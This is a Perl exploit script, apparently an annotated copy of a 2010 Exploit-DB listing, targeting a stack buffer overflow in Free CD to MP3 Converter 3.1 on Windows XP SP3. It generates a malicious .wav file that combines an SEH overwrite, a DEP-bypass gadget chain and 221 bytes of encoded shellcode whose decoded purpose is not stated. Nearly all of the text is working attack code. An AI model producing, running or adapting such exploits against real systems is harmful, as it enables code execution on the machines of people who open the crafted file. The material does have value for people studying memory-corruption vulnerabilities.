# Title : Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Published : 2010-11-20
# Author : riusksk
# Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Original exploit by C4SS!0 G0M3S: http://www.exploit-db.com/exploits/15483/
# Modified by riusksk (http://riusksk.blogbus.com)
# Tested on Windows XP SP3 CN
# Date: 2010/11/20
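#!/usr/bin/perl
# NOTE: for direct execution (./exploit.pl) this shebang must be the first
# line of the file; invoking it as `perl exploit.pl` works regardless.
#
# Free CD to MP3 Converter 3.1 - SEH overwrite delivered through a crafted
# .wav file, with a DEP bypass chain that runs before control reaches the
# shellcode (the "set eax to 1, call the NX-disable routine" sequence looks
# like the classic NtSetInformationProcess/ProcessExecuteFlags trick, but
# the source only labels it "NX Disable routine").
#
# About this copy of the listing: every "\xNN" escape had its backslash
# stripped (e.g. "x68xdcxecx77"), so Perl wrote the literal ASCII text
# "x68xdc..." instead of bytes and the generated file could never have
# triggered the bug. The escapes are restored below and build_payload()
# checks the byte lengths so that a re-garbled copy dies loudly instead of
# silently producing a useless file.
#
# All gadget addresses are specific to the Windows XP SP3 (CN) system
# modules the author tested on; they will almost certainly differ on other
# builds/languages and must be re-resolved before reuse.
#
# Usage: perl exploit.pl [output.wav]    (default: test.wav)
# Only use against systems you are authorised to test.
use strict;
use warnings;

# Build the crafted file contents and return them as a single byte string.
#
# Layout (offsets taken from the original exploit):
#   4112 bytes of filler
#   20-byte DEP-bypass chain (five little-endian dwords)
#   24 bytes of filler
#   nSEH: nop, nop, jmp +6  (skips over the SEH pointer into the nops)
#   SEH:  pop/pop/ret in a module without SafeSEH
#   2 nops followed by the encoded shellcode (221 bytes)
#
# Dies if any of the fixed-size pieces does not have its expected length,
# which is the symptom of mangled hex escapes.
sub build_payload {
    my $junk1 = 'A' x 4112;

    # DEP-bypass chain; each comment names the gadget at that address.
    my $disabledep = "\x68\xdc\xec\x77";    # 0x77ecdc68 - push esp, pop ebp, ret 4 (adjust ebp)
    $disabledep .= "\xea\x18\x97\x7c";      # 0x7c9718ea - set eax to 1
    $disabledep .= "\xff\xff\xff\xff";      # balance the stack
    $disabledep .= "\x24\xcd\x93\x7c";      # 0x7c93cd24 - run NX disable routine
    $disabledep .= "\xff\xff\xff\xff";      # balance the stack
    length($disabledep) == 20
        or die "DEP-bypass chain is not 20 bytes - hex escapes mangled?\n";

    my $junk2 = 'B' x 24;
    my $nseh  = "\x90\x90\xeb\x06";         # nop, nop, jmp short +6
    my $seh   = "\x80\x14\x40\x00";         # 0x00401480 - pop pop ret, no SafeSEH
    length($nseh) == 4 && length($seh) == 4
        or die "SEH record is not 8 bytes - hex escapes mangled?\n";

    my $nops = "\x90\x90";

    # Encoded shellcode carried over unchanged from the original exploit.
    # What it does when decoded is not documented in the source.
    my $shellcode =
        "\xb8\xc7\xae\x8e\xae\xd9\xc7\x33\xc9\xb1\x31\xd9\x74\x24" .
        "\xf4\x5b\x31\x43\x14\x83\xeb\xfc\x03\x43\x10\x25\x5b\x72" .
        "\x46\x20\xa4\x8b\x97\x52\x2c\x6e\xa6\x40\x4a\xfa\x9b\x54" .
        "\x18\xae\x17\x1f\x4c\x5b\xa3\x6d\x59\x6c\x04\xdb\xbf\x43" .
        "\x95\xea\x7f\x0f\x55\x6d\xfc\x52\x8a\x4d\x3d\x9d\xdf\x8c" .
        "\x7a\xc0\x10\xdc\xd3\x8e\x83\xf0\x50\xd2\x1f\xf1\xb6\x58" .
        "\x1f\x89\xb3\x9f\xd4\x23\xbd\xcf\x45\x38\xf5\xf7\xee\x66" .
        "\x26\x09\x22\x75\x1a\x40\x4f\x4d\xe8\x53\x99\x9c\x11\x62" .
        "\xe5\x72\x2c\x4a\xe8\x8b\x68\x6d\x13\xfe\x82\x8d\xae\xf8" .
        "\x50\xef\x74\x8d\x44\x57\xfe\x35\xad\x69\xd3\xa3\x26\x65" .
        "\x98\xa0\x61\x6a\x1f\x65\x1a\x96\x94\x88\xcd\x1e\xee\xae" .
        "\xc9\x7b\xb4\xcf\x48\x26\x1b\xf0\x8b\x8e\xc4\x54\xc7\x3d" .
        "\x10\xee\x8a\x2b\xe7\x63\xb1\x15\xe7\x7b\xba\x35\x80\x4a" .
        "\x31\xda\xd7\x53\x90\x9e\x26\xa5\x29\x0b\xbe\x1f\xd8\x76" .
        "\xa2\xa0\x36\xb4\xdb\x22\xb3\x45\x18\x3a\xb6\x40\x64\xfd" .
        "\x2a\x39\xf5\x6b\x4d\xee\xf6\xbe\x3e\x78\x09";
    length($shellcode) == 221
        or die "shellcode is not 221 bytes - hex escapes mangled?\n";

    return $junk1 . $disabledep . $junk2 . $nseh . $seh . $nops . $shellcode;
}

# Write the payload to the output file (first argument, default test.wav).
# The handle is put in binary mode so newline translation cannot alter any
# byte of the payload when the file is generated on Windows, and every I/O
# step is checked so a failed write is not mistaken for a successful run.
sub main {
    my $outfile = @ARGV ? $ARGV[0] : 'test.wav';
    my $payload = build_payload();

    open my $fh, '>', $outfile
        or die "Cannot open $outfile for writing: $!\n";
    binmode $fh;
    print {$fh} $payload
        or die "Write to $outfile failed: $!\n";
    close $fh
        or die "Close of $outfile failed: $!\n";
    return;
}

# Run only when executed as a script, so the file can also be loaded for tests.
main() unless caller;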